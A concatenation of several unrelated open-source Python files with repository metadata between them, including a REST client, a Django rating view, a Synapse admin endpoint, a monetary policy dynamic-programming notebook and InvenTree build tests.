post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, float)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
# Only set a default Content-Type for POST, PUT, PATCH and OPTIONS requests
if (method != 'DELETE') and ('Content-Type' not in headers):
headers['Content-Type'] = 'application/json'
if query_params:
url += '?' + urlencode(query_params)
if ('Content-Type' not in headers) or (re.search('json', headers['Content-Type'], re.IGNORECASE)):
request_body = None
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str) or isinstance(body, bytes):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
if r.status == 401:
raise UnauthorizedException(http_resp=r)
if r.status == 403:
raise ForbiddenException(http_resp=r)
if r.status == 404:
raise NotFoundException(http_resp=r)
if 500 <= r.status <= 599:
raise ServiceException(http_resp=r)
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
# end of class RESTClientObject
def is_ipv4(target):
""" Test if IPv4 address or not
"""
try:
chk = ipaddress.IPv4Address(target)
return True
except ipaddress.AddressValueError:
return False
def in_ipv4net(target, net):
""" Test if target belongs to given IPv4 network
"""
try:
nw = ipaddress.IPv4Network(net)
ip = ipaddress.IPv4Address(target)
if ip in nw:
return True
return False
except ipaddress.AddressValueError:
return False
except ipaddress.NetmaskValueError:
return False
def should_bypass_proxies(url, no_proxy=None):
""" Yet another requests.should_bypass_proxies
Test if proxies should not be used for a particular url.
"""
parsed = urlparse(url)
# special cases
if parsed.hostname in [None, '']:
return True
# special cases
if no_proxy in [None , '']:
return False
if no_proxy == '*':
return True
no_proxy = no_proxy.lower().replace(' ','');
entries = (
host for host in no_proxy.split(',') if host
)
if is_ipv4(parsed.hostname):
for item in entries:
if in_ipv4net(parsed.hostname, item):
return True
return proxy_bypass_environment(parsed.hostname, {'no': no_proxy} )
| 41.210375 | 179 | 0.558252 |
dfdb981453044ee18396947737b47975e82720f7 | 4,905 | py | Python | authors/apps/rating/views.py | andela/ah-alpha | dbc038c9a11362a314c258a80c4a133d11ff1012 | [
"BSD-3-Clause"
] | 1 | 2019-03-18T08:24:37.000Z | 2019-03-18T08:24:37.000Z | authors/apps/rating/views.py | andela/ah-alpha | dbc038c9a11362a314c258a80c4a133d11ff1012 | [
"BSD-3-Clause"
] | 39 | 2019-01-08T12:12:57.000Z | 2022-03-11T23:39:18.000Z | authors/apps/rating/views.py | jamesbeamie/bolt-J | 1824afd73bfba708f0e56fbd7cbb8d7521f06a1a | [
"BSD-3-Clause"
] | 2 | 2019-02-04T08:36:44.000Z | 2019-03-05T19:59:44.000Z | from rest_framework.generics import (
GenericAPIView
)
from .models import Article, Rating
from rest_framework.permissions import (
IsAuthenticatedOrReadOnly,
IsAuthenticated
)
from rest_framework.exceptions import NotFound, ValidationError
from .serializers import RatingSerializer
from rest_framework.response import Response
from .messages import error_msg, success_msg
from django.shortcuts import get_object_or_404
from rest_framework import serializers, status
from django.db.models import Avg
class RatingAPIView(GenericAPIView):
queryset = Rating.objects.all()
serializer_class = RatingSerializer
permission_classes = (IsAuthenticatedOrReadOnly,)
def get_article(self, slug):
"""
Returns specific article using slug
"""
article = Article.objects.all().filter(slug=slug).first()
return article
def get_rating(self, user, article):
"""
Returns user article rating
"""
try:
return Rating.objects.get(user=user, article=article)
except Rating.DoesNotExist:
raise NotFound(detail={'rating': error_msg['rating_not_found']})
def post(self, request, slug):
"""
Posts a rate on an article
"""
rating = request.data
article = self.get_article(slug)
# check if article exists
if not article:
raise ValidationError(
detail={'message': error_msg['not_found']})
# check owner of the article
if article.author == request.user:
raise ValidationError(
detail={'message': error_msg['own_rating']})
# updates a user's rating if it already exists
try:
# Update Rating if Exists
current_rating = Rating.objects.get(
user=request.user.id,
article=article.id
)
serializer = self.serializer_class(current_rating, data=rating)
except Rating.DoesNotExist:
# Create rating if not founds
serializer = self.serializer_class(data=rating)
serializer.is_valid(raise_exception=True)
serializer.save(user=request.user, article=article)
return Response({
'message': success_msg['rate_success'],
'data': serializer.data
}, status=status.HTTP_201_CREATED)
def get(self, request, slug):
"""
Gets articles rates
"""
article = self.get_article(slug)
rating = None
# check if article exists
if not article:
raise ValidationError(
detail={'message': error_msg['not_found']})
if request.user.is_authenticated:
try:
rating = Rating.objects.get(user=request.user, article=article)
except Rating.DoesNotExist:
pass
if rating is None:
avg = Rating.objects.filter(
article=article).aggregate(Avg('your_rating'))
average = avg['your_rating__avg']
count = Rating.objects.filter(
article=article.id).count()
if avg['your_rating__avg'] is None:
average = 0
if request.user.is_authenticated:
return Response({
'article': article.slug,
'average_rating': average,
'rate_count': count,
'your_rating': error_msg['rating_not_found']
}, status=status.HTTP_200_OK)
else:
return Response({
'article': article.slug,
'average_rating': average,
'rate_count': count,
'your_rating': error_msg['no_login']
}, status=status.HTTP_200_OK)
serializer = self.serializer_class(rating)
return Response({
'message': success_msg['retrive_success'],
'data': serializer.data
}, status=status.HTTP_200_OK)
def delete(self, request, slug):
"""
Deletes a rating
"""
article = self.get_article(slug)
if request.user.is_authenticated:
# check if article exists
if not article:
raise ValidationError(
detail={'message': error_msg['not_found']},)
elif article.author != request.user:
# get user rating and delete
rating = self.get_rating(user=request.user, article=article)
rating.delete()
return Response(
{'message': success_msg['delete_success']},
status=status.HTTP_200_OK
)
else:
raise ValidationError(
detail={'message': error_msg['no_delete']})
| 32.919463 | 79 | 0.572477 |
999f0bb619cc0ed118f4cf42a176c821186963af | 119 | py | Python | exe025-procurandostringdentrodeoutra.py | carlosbandelli/Exercicios_em_Python | 2cd5bd837fdc51932f9605db32366ad0e3871d87 | [
"MIT"
] | null | null | null | exe025-procurandostringdentrodeoutra.py | carlosbandelli/Exercicios_em_Python | 2cd5bd837fdc51932f9605db32366ad0e3871d87 | [
"MIT"
] | null | null | null | exe025-procurandostringdentrodeoutra.py | carlosbandelli/Exercicios_em_Python | 2cd5bd837fdc51932f9605db32366ad0e3871d87 | [
"MIT"
] | null | null | null | nome = str(input('Qual é seu nome completo? ').strip())
print('Seu nome tem Silva? {}'.format('silva' in nome.lower())) | 59.5 | 63 | 0.663866 |
11aee998c6bbd8d395ed9ebf68ad1c9d97495b5b | 602 | py | Python | setup.py | messente/verigator-python | a1eb020785dc1474b8a74ff351b6f0c47b649e16 | [
"Apache-2.0"
] | null | null | null | setup.py | messente/verigator-python | a1eb020785dc1474b8a74ff351b6f0c47b649e16 | [
"Apache-2.0"
] | null | null | null | setup.py | messente/verigator-python | a1eb020785dc1474b8a74ff351b6f0c47b649e16 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from setuptools import setup
setup(
name="verigator",
version="1.0.4",
packages=["messente.verigator"],
setup_requires=["requests==2.18.4"],
install_requires=["requests==2.18.4"],
tests_require=["requests-mock==1.3.0", "mock==2.0.0"],
author="Verigator.com",
author_email="admin@verigator.com",
description="Official Verigator.com API library",
license="Apache License, Version 2",
keywords="verigator messente sms verification 2FA pin code",
url="http://messente.com/documentation/",
test_suite="messente.verigator.test"
)
| 30.1 | 64 | 0.672757 |
d0c86b204a1c9f65ec53929727f95342d51f33e8 | 1,554 | py | Python | synapse/rest/admin/groups.py | littlebenlittle/synapse | 0eccf531466d762ede0dd365284a8465bfb18d0f | [
"Apache-2.0"
] | 1 | 2021-04-27T19:04:56.000Z | 2021-04-27T19:04:56.000Z | synapse/rest/admin/groups.py | littlebenlittle/synapse | 0eccf531466d762ede0dd365284a8465bfb18d0f | [
"Apache-2.0"
] | null | null | null | synapse/rest/admin/groups.py | littlebenlittle/synapse | 0eccf531466d762ede0dd365284a8465bfb18d0f | [
"Apache-2.0"
] | 1 | 2021-09-27T14:45:52.000Z | 2021-09-27T14:45:52.000Z | # -*- coding: utf-8 -*-
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from synapse.api.errors import SynapseError
from synapse.http.servlet import RestServlet
from synapse.rest.admin._base import admin_patterns, assert_user_is_admin
logger = logging.getLogger(__name__)
class DeleteGroupAdminRestServlet(RestServlet):
"""Allows deleting of local groups
"""
PATTERNS = admin_patterns("/delete_group/(?P<group_id>[^/]*)")
def __init__(self, hs):
self.group_server = hs.get_groups_server_handler()
self.is_mine_id = hs.is_mine_id
self.auth = hs.get_auth()
async def on_POST(self, request, group_id):
requester = await self.auth.get_user_by_req(request)
await assert_user_is_admin(self.auth, requester.user)
if not self.is_mine_id(group_id):
raise SynapseError(400, "Can only delete local groups")
await self.group_server.delete_group(group_id, requester.user.to_string())
return 200, {}
| 35.318182 | 82 | 0.729086 |
27e623bed9452b38cb8bb819cc1fd3cffac10b75 | 727 | py | Python | matplot/subplots.py | rodrigoc-silva/machine-learnig | bcd1be36b1217c20c29a98b7991aefc62faa79f9 | [
"MIT"
] | null | null | null | matplot/subplots.py | rodrigoc-silva/machine-learnig | bcd1be36b1217c20c29a98b7991aefc62faa79f9 | [
"MIT"
] | null | null | null | matplot/subplots.py | rodrigoc-silva/machine-learnig | bcd1be36b1217c20c29a98b7991aefc62faa79f9 | [
"MIT"
] | null | null | null |
import pandas as pd
from matplotlib import pyplot as plt
plt.style.use('seaborn')
data = pd.read_csv('data2.csv')
ages = data['Age']
dev_salaries = data['All_Devs']
py_salaries = data['Python']
js_salaries = data['JavaScript']
fig, (ax1, ax2) = plt.subplots(nrows=2, ncols=1, sharex=True)
# fig1, ax1 = plt.subplots()
# fig2, ax2 = plt.subplots()
ax1.plot(ages, dev_salaries, color='#444444', linestyle='--', label='All Devs')
ax2.plot(ages, py_salaries, label='Python')
ax2.plot(ages, js_salaries, label='JavaScript')
ax1.legend()
ax1.set_title('Median Salary (USD) by Age')
ax1.set_ylabel('Median Salary (USD)')
ax2.legend()
ax2.set_xlabel('Ages')
ax2.set_ylabel('Median Salary (USD)')
plt.tight_layout()
plt.show() | 22.71875 | 79 | 0.709766 |
44d81d496fe35f74cc9ae63d9c53a87e4fc1ab81 | 1,230 | py | Python | test/test_loss.py | petteriTeikari/crank-voiceconversion-wrapper | 8d34a76a8a4949cb1780a4770922f755dd04000c | [
"MIT"
] | null | null | null | test/test_loss.py | petteriTeikari/crank-voiceconversion-wrapper | 8d34a76a8a4949cb1780a4770922f755dd04000c | [
"MIT"
] | null | null | null | test/test_loss.py | petteriTeikari/crank-voiceconversion-wrapper | 8d34a76a8a4949cb1780a4770922f755dd04000c | [
"MIT"
] | null | null | null | #! /usr/local/bin/python
# -*- coding: utf-8 -*-
#
# test_loss.py
# First ver.: 2020-05-12
#
# Copyright 2020
# K. Kobayashi <root.4mac@gmail.com>
#
# Distributed under terms of the MIT license.
#
"""
"""
import torch
from crank.net.module.loss import (CustomFeatureLoss, MultiSizeSTFTLoss,
STFTLoss)
B, T, D = 3, 1000, 10
def test_stftloss():
fft_size, hop_size, win_size = 32, 10, 20
x = torch.randn((B, T * 100, D))
y = torch.randn((B, T * 100, D))
criterion = STFTLoss(
fft_size=fft_size,
hop_size=hop_size,
win_size=win_size,
logratio=0.0,
device="cpu",
)
_ = criterion(x, y)
criterion = MultiSizeSTFTLoss(device="cpu")
_ = criterion(x, y)
def test_customloss():
x = torch.randn((B, T, D))
y = torch.randn((B, T, D))
mask = x.ge(0)
for c in [-8, -2, 0, 2, 8]:
for loss_type in ["l1", "mse", "stft"]:
criterion = CustomFeatureLoss(
loss_type=loss_type, causal=True, device="cpu"
)
if loss_type != "stft":
_ = criterion(x, y, mask=mask, causal_size=c)
else:
_ = criterion(x, y)
| 22.363636 | 72 | 0.534146 |
d37b237042474d52fb56a405fab3c2158d129235 | 9,502 | py | Python | _build/jupyter_execute/notebooks/dp/11 Monetary Policy Model.py | randall-romero/CompEcon-python | c7a75f57f8472c972fddcace8ff7b86fee049d29 | [
"MIT"
] | 23 | 2016-12-14T13:21:27.000Z | 2020-08-23T21:04:34.000Z | _build/jupyter_execute/notebooks/dp/11 Monetary Policy Model.py | randall-romero/CompEcon | c7a75f57f8472c972fddcace8ff7b86fee049d29 | [
"MIT"
] | 1 | 2017-09-10T04:48:54.000Z | 2018-03-31T01:36:46.000Z | _build/jupyter_execute/notebooks/dp/11 Monetary Policy Model.py | randall-romero/CompEcon-python | c7a75f57f8472c972fddcace8ff7b86fee049d29 | [
"MIT"
] | 13 | 2017-02-25T08:10:38.000Z | 2020-05-15T09:49:16.000Z | #!/usr/bin/env python
# coding: utf-8
# # Monetary Policy Model
#
# **Randall Romero Aguilar, PhD**
#
# This demo is based on the original Matlab demo accompanying the <a href="https://mitpress.mit.edu/books/applied-computational-economics-and-finance">Computational Economics and Finance</a> 2001 textbook by Mario Miranda and Paul Fackler.
#
# Original (Matlab) CompEcon file: **demdp11.m**
#
# Running this file requires the Python version of CompEcon. This can be installed with pip by running
#
# !pip install compecon --upgrade
#
# <i>Last updated: 2021-Oct-01</i>
# <hr>
# ## About
#
# A central bank must set nominal interest rate so as to minimize deviations of inflation rate and GDP gap from established targets.
#
# A monetary authority wishes to control the nominal interest rate $x$ in order to minimize the variation of the inflation rate $s_1$ and the gross domestic product (GDP) gap $s_2$ around specified targets $s^∗_1$ and $s^∗_2$, respectively. Specifically, the authority wishes to minimize expected discounted stream of weighted squared deviations
#
# \begin{equation}
# L(s) = \frac{1}{2}(s − s^∗)'\Omega(s − s^∗)
# \end{equation}
#
# where $s$ is a $2\times 1$ vector containing the inflation rate and the GDP gap, $s^∗$ is a $2\times 1$ vector of targets, and $\Omega$ is a $2 \times 2$ constant positive definite matrix of preference weights. The inflation rate and the GDP gap are a joint controlled exogenous linear Markov process
#
# \begin{equation}
# s_{t+1} = \alpha + \beta s_t + \gamma x_t + \epsilon_{t+1}
# \end{equation}
#
# where $\alpha$ and $\gamma$ are $2 \times 1$ constant vectors, $\beta$ is a $2 \times 2$ constant matrix, and $\epsilon$ is a $2 \times 1$ random vector with mean zero. For institutional reasons, the nominal interest rate $x$ cannot be negative. **What monetary policy minimizes the sum of current and expected future losses?**
#
# This is an infinite horizon, stochastic model with time $t$ measured in years. The state vector $s \in \mathbb{R}^2$
# contains the inflation rate and the GDP gap. The action variable $x \in [0,\infty)$ is the nominal interest rate. The state transition function is $g(s, x, \epsilon) = \alpha + \beta s + \gamma x + \epsilon$
#
# In order to formulate this problem as a maximization problem, one posits a reward function that equals the negative of the loss function $f(s,x) = −L(s)$
#
# The sum of current and expected future rewards satisfies the Bellman equation
#
# \begin{equation}
# V(s) = \max_{0\leq x}\left\{-L(s) + \delta + E_\epsilon V\left(g(s,x,\epsilon)\right)\right\}
# \end{equation}
#
#
# Given the structure of the model, one cannot preclude the possibility that the nonnegativity constraint on the optimal nominal interest rate will be binding in certain states. Accordingly, the shadow-price function $\lambda(s)$ is characterized by the Euler conditions
#
# \begin{align}
# \delta\gamma'E_\epsilon \lambda\left(g(s,x,\epsilon)\right) &= \mu \\
# \lambda(s) &= -\Omega(s-s^*) + \delta\beta'E_\epsilon \lambda\left(g(s,x,\epsilon)\right)
# \end{align}
#
# where the nominal interest rate $x$ and the long-run marginal reward $\mu$ from increasing the nominal interest rate must satisfy the complementarity condition
# \begin{equation}
# x \geq 0, \qquad \mu \leq 0, \qquad x > 0 \Rightarrow \mu = 0
# \end{equation}
#
# It follows that along the optimal path
#
# \begin{align}
# \delta\gamma'E_\epsilon \lambda_{t+1} &= \mu_t \\
# \lambda_t &= -\Omega(s_t-s^*) + \delta\beta'E_\epsilon \lambda_{t+1}\\
# x \geq 0, \qquad \mu \leq 0, &\qquad x > 0 \Rightarrow \mu = 0
# \end{align}
#
# Thus, in any period, the nominal interest rate is reduced until either the long-run marginal reward or the nominal interest rate is driven to zero.
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from compecon import BasisChebyshev, DPmodel, BasisSpline, qnwnorm, demo
import pandas as pd
pd.set_option('display.float_format',lambda x: f'{x:.3f}')
# ### Model Parameters
#
# In[2]:
α = np.array([[0.9, -0.1]]).T # transition function constant coefficients
β = np.array([[-0.5, 0.2], [0.3, -0.4]]) # transition function state coefficients
γ = np.array([[-0.1, 0.0]]).T # transition function action coefficients
Ω = np.identity(2) # central banker's preference weights
ξ = np.array([[1, 0]]).T # equilibrium targets
μ = np.zeros(2) # shock mean
σ = 0.08 * np.identity(2), # shock covariance matrix
δ = 0.9 # discount factor
# ### State Space
# There are two state variables: 'GDP gap' = $s_0\in[-2,2]$ and 'inflation'=$s_1\in[-3,3]$.
# In[3]:
n = 21
smin = [-2, -3]
smax = [ 2, 3]
basis = BasisChebyshev(n, smin, smax, method='complete',
labels=['GDP gap', 'inflation'])
# ### Action space
#
# There is only one action variable x: the nominal interest rate, which must be nonnegative.
# In[4]:
def bounds(s, i, j):
lb = np.zeros_like(s[0])
ub = np.full(lb.shape, np.inf)
return lb, ub
# ### Reward Function
# In[5]:
def reward(s, x, i, j):
s = s - ξ
f = np.zeros_like(s[0])
for ii in range(2):
for jj in range(2):
f -= 0.5 * Ω[ii, jj] * s[ii] * s[jj]
fx = np.zeros_like(x)
fxx = np.zeros_like(x)
return f, fx, fxx
# ### State Transition Function
# In[6]:
def transition(s, x, i, j, in_, e):
g = α + β @ s + γ @ x + e
gx = np.tile(γ, (1, x.size))
gxx = np.zeros_like(s)
return g, gx, gxx
# The continuous shock must be discretized. Here we use Gauss-Legendre quadrature to obtain nodes and weights defining a discrete distribution that matches the first 6 moments of the Normal distribution (this is achieved with m=3 nodes and weights) for each of the state variables.
# In[7]:
m = [3, 3]
[e,w] = qnwnorm(m,μ,σ)
# ### Model structure
# In[8]:
bank = DPmodel(basis, reward, transition, bounds,
x=['interest'], discount=δ, e=e, w=w)
# Compute Unconstrained Deterministic Steady-State
# In[9]:
bank_lq = bank.lqapprox(ξ,0)
sstar = bank_lq.steady['s']
xstar = bank_lq.steady['x']
# If Nonnegativity Constraint Violated, Re-Compute Deterministic Steady-State
# In[10]:
if xstar < 0:
I = np.identity(2)
xstar = 0.0
sstar = np.linalg.solve(np.identity(2) - β, α)
frmt = '\t%-21s = %5.2f'
print('Deterministic Steady-State')
print(frmt % ('GDP Gap', sstar[0]))
print(frmt % ('Inflation Rate', sstar[1]))
print(frmt % ('Nominal Interest Rate', xstar))
# ### Solve the model
# We solve the model by calling the `solve` method in `bank`. On return, `sol` is a pandas dataframe with columns *GDP gap*, *inflation*, *value*, *interest*, and *resid*. We set a refined grid `nr=5` for this output.
# In[11]:
S = bank.solve(nr=5)
# To make the 3D plots, we need to reshape the columns of `sol`.
# In[12]:
S3d = {x: S[x].values.reshape((5*n,5*n)) for x in S.columns}
# This function will make all plots
# In[13]:
def makeplot(series,zlabel,zticks,title):
fig = plt.figure(figsize=[8,5])
ax = fig.gca(projection='3d')
ax.plot_surface(S3d['GDP gap'], S3d['inflation'], S3d[series], cmap=cm.coolwarm)
ax.set_xlabel('GDP gap')
ax.set_ylabel('Inflation')
ax.set_zlabel(zlabel)
ax.set_xticks(np.arange(-2,3))
ax.set_yticks(np.arange(-3,4))
ax.set_zticks(zticks)
ax.set_title(title)
# ### Optimal policy
# In[14]:
fig1 = makeplot('interest', 'Nomianal Interest Rate',
np.arange(0,21,5),'Optimal Monetary Policy')
# ### Value function
# In[15]:
fig2 = makeplot('value','Value',
np.arange(-12,S['value'].max(),4),'Value Function')
# ### Residuals
# In[16]:
fig3 = makeplot('resid','Residual',
[-1.5e-3, 0, 1.5e3],'Bellman Equation Residual')
plt.ticklabel_format(style='sci', axis='z', scilimits=(-1,1))
# ## Simulating the model
#
# We simulate 21 periods of the model starting from $s=s_{\min}$, 10000 repetitions.
# In[17]:
T = 21
nrep = 10_000
data = bank.simulate(T, np.tile(np.atleast_2d(smax).T,nrep))
# In[18]:
subdata = data[data['time']==T][['GDP gap', 'inflation', 'interest']]
stats =pd.DataFrame({'Deterministic Steady-State': [*sstar.flatten(), xstar],
'Ergodic Means': subdata.mean(),
'Ergodic Standard Deviations': subdata.std()})
stats.T
# ### Simulated State and Policy Paths
# In[19]:
subdata = data[data['_rep'].isin(range(3))]
opts = dict(spec='r*', offset=(0, -15), fs=11, ha='right')
gdpstar, infstar, intstar = stats['Ergodic Means']
def simplot(series,ylabel,yticks,steady):
fig = demo.figure('Simulated and Expected ' + ylabel,'Period', ylabel,[0, T + 0.5])
plt.plot(data[['time',series]].groupby('time').mean())
plt.plot(subdata.pivot('time','_rep',series),lw=1)
plt.xticks(np.arange(0,24,4))
plt.yticks(yticks)
demo.annotate(T, steady, f'Expected {series}\n = {steady:.2f}', **opts)
return fig
# In[20]:
fig4 = simplot('GDP gap','GDP gap',np.arange(smin[0],smax[0]+1),gdpstar)
# In[21]:
fig5 = simplot('inflation', 'Inflation Rate',np.arange(smin[1],smax[1]+1),infstar)
# In[22]:
fig6 = simplot('interest','Nominal Interest Rate',np.arange(-2,5),intstar)
# In[23]:
#demo.savefig([fig1,fig2,fig3,fig4,fig5,fig6])
| 28.969512 | 345 | 0.651021 |
b572feb14b8f529842f9f322cf4f0a5b5e29ea7b | 10,928 | py | Python | InvenTree/build/test_build.py | Guusggg/InvenTree | fa163b88665b69de93fafd822faf1c1953cf4d87 | [
"MIT"
] | null | null | null | InvenTree/build/test_build.py | Guusggg/InvenTree | fa163b88665b69de93fafd822faf1c1953cf4d87 | [
"MIT"
] | null | null | null | InvenTree/build/test_build.py | Guusggg/InvenTree | fa163b88665b69de93fafd822faf1c1953cf4d87 | [
"MIT"
] | 1 | 2021-06-22T15:07:39.000Z | 2021-06-22T15:07:39.000Z | # -*- coding: utf-8 -*-
from django.test import TestCase
from django.core.exceptions import ValidationError
from django.db.utils import IntegrityError
from InvenTree import status_codes as status
from build.models import Build, BuildItem, get_next_build_number
from stock.models import StockItem
from part.models import Part, BomItem
class BuildTest(TestCase):
"""
Run some tests to ensure that the Build model is working properly.
"""
def setUp(self):
"""
Initialize data to use for these tests.
The base Part 'assembly' has a BOM consisting of three parts:
- 5 x sub_part_1
- 3 x sub_part_2
- 2 x sub_part_3 (trackable)
We will build 10x 'assembly' parts, in two build outputs:
- 3 x output_1
- 7 x output_2
"""
# Create a base "Part"
self.assembly = Part.objects.create(
name="An assembled part",
description="Why does it matter what my description is?",
assembly=True,
trackable=True,
)
self.sub_part_1 = Part.objects.create(
name="Widget A",
description="A widget",
component=True
)
self.sub_part_2 = Part.objects.create(
name="Widget B",
description="A widget",
component=True
)
self.sub_part_3 = Part.objects.create(
name="Widget C",
description="A widget",
component=True,
trackable=True
)
# Create BOM item links for the parts
BomItem.objects.create(
part=self.assembly,
sub_part=self.sub_part_1,
quantity=5
)
BomItem.objects.create(
part=self.assembly,
sub_part=self.sub_part_2,
quantity=3
)
# sub_part_3 is trackable!
BomItem.objects.create(
part=self.assembly,
sub_part=self.sub_part_3,
quantity=2
)
ref = get_next_build_number()
if ref is None:
ref = "0001"
# Create a "Build" object to make 10x objects
self.build = Build.objects.create(
reference=ref,
title="This is a build",
part=self.assembly,
quantity=10
)
# Create some build output (StockItem) objects
self.output_1 = StockItem.objects.create(
part=self.assembly,
quantity=3,
is_building=True,
build=self.build
)
self.output_2 = StockItem.objects.create(
part=self.assembly,
quantity=7,
is_building=True,
build=self.build,
)
# Create some stock items to assign to the build
self.stock_1_1 = StockItem.objects.create(part=self.sub_part_1, quantity=1000)
self.stock_1_2 = StockItem.objects.create(part=self.sub_part_1, quantity=100)
self.stock_2_1 = StockItem.objects.create(part=self.sub_part_2, quantity=5000)
self.stock_3_1 = StockItem.objects.create(part=self.sub_part_3, quantity=1000)
def test_init(self):
# Perform some basic tests before we start the ball rolling
self.assertEqual(StockItem.objects.count(), 6)
# Build is PENDING
self.assertEqual(self.build.status, status.BuildStatus.PENDING)
# Build has two build outputs
self.assertEqual(self.build.output_count, 2)
# None of the build outputs have been completed
for output in self.build.get_build_outputs().all():
self.assertFalse(self.build.isFullyAllocated(output))
self.assertFalse(self.build.isPartFullyAllocated(self.sub_part_1, self.output_1))
self.assertFalse(self.build.isPartFullyAllocated(self.sub_part_2, self.output_2))
self.assertEqual(self.build.unallocatedQuantity(self.sub_part_1, self.output_1), 15)
self.assertEqual(self.build.unallocatedQuantity(self.sub_part_1, self.output_2), 35)
self.assertEqual(self.build.unallocatedQuantity(self.sub_part_2, self.output_1), 9)
self.assertEqual(self.build.unallocatedQuantity(self.sub_part_2, self.output_2), 21)
self.assertFalse(self.build.is_complete)
def test_build_item_clean(self):
# Ensure that dodgy BuildItem objects cannot be created
stock = StockItem.objects.create(part=self.assembly, quantity=99)
# Create a BuiltItem which points to an invalid StockItem
b = BuildItem(stock_item=stock, build=self.build, quantity=10)
with self.assertRaises(ValidationError):
b.save()
# Create a BuildItem which has too much stock assigned
b = BuildItem(stock_item=self.stock_1_1, build=self.build, quantity=9999999)
with self.assertRaises(ValidationError):
b.clean()
# Negative stock? Not on my watch!
b = BuildItem(stock_item=self.stock_1_1, build=self.build, quantity=-99)
with self.assertRaises(ValidationError):
b.clean()
# Ok, what about we make one that does *not* fail?
b = BuildItem(stock_item=self.stock_1_1, build=self.build, install_into=self.output_1, quantity=10)
b.save()
def test_duplicate_bom_line(self):
# Try to add a duplicate BOM item - it should fail!
with self.assertRaises(IntegrityError):
BomItem.objects.create(
part=self.assembly,
sub_part=self.sub_part_1,
quantity=99
)
def allocate_stock(self, output, allocations):
"""
Allocate stock to this build, against a particular output
Args:
output - StockItem object (or None)
allocations - Map of {StockItem: quantity}
"""
for item, quantity in allocations.items():
BuildItem.objects.create(
build=self.build,
stock_item=item,
quantity=quantity,
install_into=output
)
def test_partial_allocation(self):
"""
Test partial allocation of stock
"""
# Fully allocate tracked stock against build output 1
self.allocate_stock(
self.output_1,
{
self.stock_3_1: 6,
}
)
self.assertTrue(self.build.isFullyAllocated(self.output_1))
# Partially allocate tracked stock against build output 2
self.allocate_stock(
self.output_2,
{
self.stock_3_1: 1,
}
)
self.assertFalse(self.build.isFullyAllocated(self.output_2))
# Partially allocate untracked stock against build
self.allocate_stock(
None,
{
self.stock_1_1: 1,
self.stock_2_1: 1
}
)
self.assertFalse(self.build.isFullyAllocated(None, verbose=True))
unallocated = self.build.unallocatedParts(None)
self.assertEqual(len(unallocated), 2)
self.allocate_stock(
None,
{
self.stock_1_2: 100,
}
)
self.assertFalse(self.build.isFullyAllocated(None, verbose=True))
unallocated = self.build.unallocatedParts(None)
self.assertEqual(len(unallocated), 1)
